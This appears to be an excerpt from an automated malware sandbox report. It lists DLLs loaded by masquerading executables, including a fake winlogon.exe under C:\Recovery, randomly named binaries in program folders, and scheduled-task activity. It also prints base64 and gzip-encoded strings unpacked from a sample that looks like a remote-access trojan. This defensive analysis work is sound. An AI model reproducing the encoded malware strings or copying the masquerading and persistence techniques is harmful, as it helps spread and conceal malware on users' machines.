                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: mscoree.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: apphelp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: kernel.appcore.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: version.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: uxtheme.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: windows.storage.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: wldp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: profapi.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: cryptsp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: rsaenh.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: cryptbase.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: mscoree.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: kernel.appcore.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: version.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: uxtheme.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: windows.storage.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: wldp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: profapi.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: cryptsp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: rsaenh.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: cryptbase.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sspicli.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: mscoree.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: apphelp.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: version.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: wldp.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: profapi.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: mscoree.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: kernel.appcore.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: version.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: uxtheme.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: windows.storage.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: wldp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: profapi.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: cryptsp.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: rsaenh.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: cryptbase.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: ktmw32.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: propsys.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: edputil.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: urlmon.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: iertutil.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: srvcli.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: netutils.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: wintypes.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: appresolver.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: bcp47langs.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: slc.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: userenv.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: sppc.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: mpr.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: pcacli.dll
                                Source: C:\Recovery\winlogon.exeSection loaded: sfc_os.dll
                                Source: H9gMIu2HXi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.csCryptographic APIs: 'TransformBlock'
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.csCryptographic APIs: 'TransformBlock'
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, qJk.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sz3.csBase64 encoded string: 'IRHKkK7+9S0IugXON3gvLsxJjZL9YaEKz/ItfY2KMibv3HGRDY4HX1+0x6vyRlP1N4gE0v20VeDKoKK009sEy3ouyqPq1nDV7UInHLKa0+i1EzCuhkbBF+hHquku7Lo/yvKfWKTtDSC0cid2m2aAXySLeN9z77QHOw6ohp+EDczjdlkMq8m7a2ClwiEast7dEwz6w4bD8wTSzoz4j5qzrO8RqjmHTyrApuBSl+1gu2s5LoFXoH5oPozdF2hTyr4UJafbA2pNEGdP/VLXgbIg4QM5bvggf+gkojeqw45IqHRg8ZcCDn/xnBJvzaQskNO/n2SyskcGTGC2IHglQTunUGHh4+wEaQYtR4uojeQt1AxtzrO/QY7Xs4yhQpA5ELH1fxkHlN9mBEm06zoECj/vz7jJG2mQlWiHY9U9LUYCXv/lx66c36E3vw4zQ5xVrzhaydHvLiCXt0pZUDFEWfZaVaZ5AKGW0zqkBSvHh4qMXIukrkK1kUF6G2eX26nBF9etwOUvoJ9uQsq2Dy+GQBdk03ZdTGhPoKKJfEvzulE4FSXAoUFrTLyla3gXMOhV434cPyDRSbyiZCGATsBDfEtT+1yp5qKdbJS1GVEo5JVGDZl853Kba/dh4CBx/W6Bj/DOJfimC7NBUJ/HnfsGb830T09NrdXxjZIarRpeDSqLXVWibkiIPnFO4OU2WXtEARxfTEp9gbRaEngqlbHte7O4oMf4xO52NXpTo1ex3oIjKRiCMDA77sbJvezZ+hixbnlgDJbVmAulozOcoeLeIT3ajMgqvfmAPVAXbuYvJdtKwevtf2DUl7lEqIkiitboMQ9wa/o5JrJJMwrsX1U4U56gMIX+zCYsR3sgBH+1dLI394nm8h9oLc/7DXLFKCEkJSnOT6P/PRLwNHmWcoHO0WJ5Y6IdGtC8rsInOmg1aD9JbLPqksSmWRX6XfZYmKthY9wC1SDjDFSXykgutRHU6ciKTBRxlvwAPW8V/yOJ1rOCNpk='
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class17.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.csBase64 encoded string: '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